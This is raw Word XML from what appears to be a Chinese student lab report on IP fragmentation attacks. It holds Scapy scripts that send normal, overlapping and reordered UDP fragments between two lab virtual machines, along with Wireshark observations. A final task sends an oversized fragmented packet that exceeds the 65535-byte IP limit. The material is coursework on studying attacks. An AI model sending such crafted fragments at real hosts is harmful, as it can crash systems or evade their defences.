      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31657D00" w14:textId="0B47169D" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908">
      <w:r>
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7923F9" w14:textId="77777777" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908"/>
    <w:p w14:paraId="4B65B90F" w14:textId="77777777" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908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="192.168.19.143", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">="192.168.19.144",id=1000,frag=9,proto=17) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187957BB" w14:textId="77777777" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908">
      <w:r>
        <w:t>payload = 'C' * 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02276E44" w14:textId="77777777" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908">
      <w:r>
        <w:t xml:space="preserve">pkt = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A3FBA" w14:textId="04A69EB8" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908">
      <w:r>
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0723AE92" w14:textId="7EECD394" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908"/>
    <w:p w14:paraId="5E7DCBFA" w14:textId="7BAA2C11" w:rsidR="00C51908" w:rsidRPr="00C51908" w:rsidRDefault="00074D21" w:rsidP="00C51908">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一台虚拟机的</w:t>
      </w:r>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ireshark显示已接收到三个分片</w:t>
      </w:r>
      <w:r w:rsidR="00474FF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00474FF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00474FF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并未成功解析出报文内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3A63AB" w14:textId="1FA2BB76" w:rsidR="001F4A28" w:rsidRDefault="00474FF1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40FE541E" wp14:editId="485A29B9">
            <wp:extent cx="5274310" cy="3359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1E1E" w14:textId="3996066A" w:rsidR="00074D21" w:rsidRDefault="00474FF1" w:rsidP="0033484C">
      <w:pPr>
        <w:rPr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438BAA" wp14:editId="34F93A2D">
            <wp:extent cx="5274310" cy="6273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D225" w14:textId="280AB3C7" w:rsidR="00794353" w:rsidRDefault="00794353" w:rsidP="0033484C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D9FA712" wp14:editId="30D925D9">
            <wp:extent cx="4638675" cy="981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0597" w14:textId="3F0DAAE6" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="0033484C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F46B8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>（2）实验二：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>overlapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF0B6D1" w14:textId="46E7DEEC" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码如下，其中第二个分片的frag参数从5改为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，第二分片长度变为3</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA223B3" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRPr="00C51908" w:rsidRDefault="006F46B8" w:rsidP="006F46B8"/>
    <w:p w14:paraId="1A407793" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r>
        <w:t xml:space="preserve">#!/usr/bin/python3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36380B4F" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8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14:paraId="1F16A56D" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8"/>
    <w:p w14:paraId="42D50444" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8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="192.168.19.143", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">="192.168.19.144",id=1000,frag=0,flags=1) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01116AFD" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = UDP(sport=7070, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=9090,len=104,chksum=0)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14422DED" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r>
        <w:t>payload = 'A' * 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E8918C" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r>
        <w:t xml:space="preserve">pkt = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2492E4" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r>
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6824340E" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8"/>
    <w:p w14:paraId="4FEDE769" w14:textId="6BB72FEC" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8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="192.168.19.143", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">="192.168.19.144",id=1000,frag=1,flags=1,proto=17) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D37751" w14:textId="0F083C9A" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r>
        <w:t xml:space="preserve">payload = 'B' * 64 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9545E6" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r>
        <w:t xml:space="preserve">pkt = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA782EA" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r>
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5156164F" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8"/>
    <w:p w14:paraId="6EA2C397" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8"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 xml:space="preserve">="192.168.19.143", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">="192.168.19.144",id=1000,frag=9,proto=17) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75367176" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r>
        <w:t>payload = 'C' * 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ABB494" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r>
        <w:t xml:space="preserve">pkt = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3B5D39" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r>
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227403D0" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8"/>
    <w:p w14:paraId="4CDFEC49" w14:textId="46B35836" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="0033484C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一台虚拟机的</w:t>
      </w:r>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ireshark显示已接收到三个分片，但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并未成功解析出报文内容</w:t>
      </w:r>
      <w:r w:rsidR="00794353">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00794353">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00794353">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合并报文后如下，重叠部分显示第一分片内容，不显示第二分片</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79044B3E" w14:textId="4B17326E" w:rsidR="006F46B8" w:rsidRDefault="006F46B8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E2EF5D2" wp14:editId="2D5CCB13">
            <wp:extent cx="5274310" cy="25844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62BD2" wp14:editId="0CBF0082">
            <wp:extent cx="5274310" cy="291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7DDA" w14:textId="7314E51A" w:rsidR="00794353" w:rsidRDefault="00794353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1A3F0BC" wp14:editId="28556B5E">
            <wp:extent cx="5274310" cy="10439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0B43" w14:textId="77777777" w:rsidR="00794353" w:rsidRDefault="00794353" w:rsidP="0033484C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56125B5D" w14:textId="1459408A" w:rsidR="006F46B8" w:rsidRDefault="006F46B8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（3）实验三：交换第一分片和第二分片的传送顺序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3F2E6D" w14:textId="77989964" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="0033484C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代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7442ABB3" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r w:rsidRPr="006F46B8">
        <w:t xml:space="preserve">#!/usr/bin/python3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC1F766" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r w:rsidRPr="006F46B8">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783CEA2E" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8"/>
    <w:p w14:paraId="53F0D6A7" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t xml:space="preserve"> = IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t xml:space="preserve">="192.168.19.143", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t xml:space="preserve">="192.168.19.144",id=1000,frag=5,flags=1,proto=17) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5967ACE4" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r w:rsidRPr="006F46B8">
        <w:t xml:space="preserve">payload = 'B' * 32 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79609A11" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r w:rsidRPr="006F46B8">
        <w:t xml:space="preserve">pkt = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>/payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0365F5" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r w:rsidRPr="006F46B8">
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6B0B25" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8"/>
    <w:p w14:paraId="08976B8D" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t xml:space="preserve"> = IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t xml:space="preserve">="192.168.19.143", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t xml:space="preserve">="192.168.19.144",id=1000,frag=0,flags=1) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3405C349" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t xml:space="preserve"> = UDP(sport=7070, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t xml:space="preserve">=9090,len=104,chksum=0)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2190CC" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r w:rsidRPr="006F46B8">
        <w:t>payload = 'A' * 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBCD4AE" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r w:rsidRPr="006F46B8">
        <w:t xml:space="preserve">pkt = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>/payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D37C045" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r w:rsidRPr="006F46B8">
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED80596" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8"/>
    <w:p w14:paraId="205B2256" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t xml:space="preserve"> = IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t xml:space="preserve">="192.168.19.143", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t xml:space="preserve">="192.168.19.144",id=1000,frag=9,proto=17) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634104B9" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r w:rsidRPr="006F46B8">
        <w:t>payload = 'C' * 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505F11FC" w14:textId="77777777" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r w:rsidRPr="006F46B8">
        <w:t xml:space="preserve">pkt = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F46B8">
        <w:t>/payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34419787" w14:textId="7AC15554" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r w:rsidRPr="006F46B8">
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F37C70" w14:textId="48F9B785" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8"/>
    <w:p w14:paraId="2F023332" w14:textId="16065E09" w:rsidR="006F46B8" w:rsidRPr="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="006F46B8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一台虚拟机中，Wireshark显示第一分片和第二分片的顺序的确发生了颠倒，但是因为每一个分片中都包含偏移量数据，所以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解析出的报文内容依然正确。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477A7AC2" w14:textId="41D7CF79" w:rsidR="006F46B8" w:rsidRDefault="006F46B8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62828C98" wp14:editId="0911AA7A">
            <wp:extent cx="5274310" cy="2762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3C6F" w14:textId="5D6AFF0D" w:rsidR="006F46B8" w:rsidRDefault="006F46B8" w:rsidP="0033484C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2517C69F" wp14:editId="08B5CF21">
            <wp:extent cx="5274310" cy="3886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72EE" w14:textId="75D12211" w:rsidR="00B527E9" w:rsidRDefault="00B527E9" w:rsidP="0033484C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A991217" w14:textId="1A12930C" w:rsidR="00B527E9" w:rsidRPr="00B527E9" w:rsidRDefault="00B527E9" w:rsidP="0033484C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B527E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r w:rsidRPr="00B527E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B527E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>c:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5269E7D9" w14:textId="1F0A8BC8" w:rsidR="008504E6" w:rsidRDefault="008504E6" w:rsidP="008504E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代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603DC990" w14:textId="35E94E34" w:rsidR="008504E6" w:rsidRPr="008504E6" w:rsidRDefault="008504E6" w:rsidP="008504E6">
      <w:r w:rsidRPr="008504E6">
        <w:t xml:space="preserve">#!/usr/bin/python3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6A94B8" w14:textId="77777777" w:rsidR="008504E6" w:rsidRPr="008504E6" w:rsidRDefault="008504E6" w:rsidP="008504E6">
      <w:r w:rsidRPr="008504E6">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008504E6">
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008504E6">
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD836E7" w14:textId="77777777" w:rsidR="008504E6" w:rsidRPr="008504E6" w:rsidRDefault="008504E6" w:rsidP="008504E6"/>
    <w:p w14:paraId="7D39C8C7" w14:textId="5F0F30D5" w:rsidR="0040123E" w:rsidRDefault="008504E6" w:rsidP="0033484C">
      <w:r w:rsidRPr="008504E6">
        <w:t>send(fragment(IP(dst="192.168.19.144")/UDP(dport=9090,chksum=0)/("X"*60000)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D134C4" w14:textId="48E237CB" w:rsidR="009D1EA0" w:rsidRDefault="009D1EA0" w:rsidP="0033484C"/>
    <w:p w14:paraId="741FC62A" w14:textId="41DB5ACE" w:rsidR="009D1EA0" w:rsidRDefault="009D1EA0" w:rsidP="0033484C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>超大报文的载荷为6</w:t>
      </w:r>
      <w:r>
        <w:t>5527</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，加上U</w:t>
      </w:r>
      <w:r>
        <w:t>DP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报头和I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报头的长度后，超出6</w:t>
      </w:r>
      <w:r>
        <w:t>5535</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的长度限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D113F6F" w14:textId="10CF19DC" w:rsidR="006F46B8" w:rsidRPr="009D1EA0" w:rsidRDefault="009D1EA0" w:rsidP="0033484C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C22E2F9" wp14:editId="03E2717A">
            <wp:extent cx="5274310" cy="26689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FC79" w14:textId="11F09CE1" w:rsidR="008504E6" w:rsidRDefault="009D1EA0" w:rsidP="0033484C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37DEEF89" wp14:editId="1074773E">
            <wp:extent cx="5274310" cy="7747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1CD" w14:textId="5774A0EE" w:rsidR="0040123E" w:rsidRDefault="0040123E" w:rsidP="0033484C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
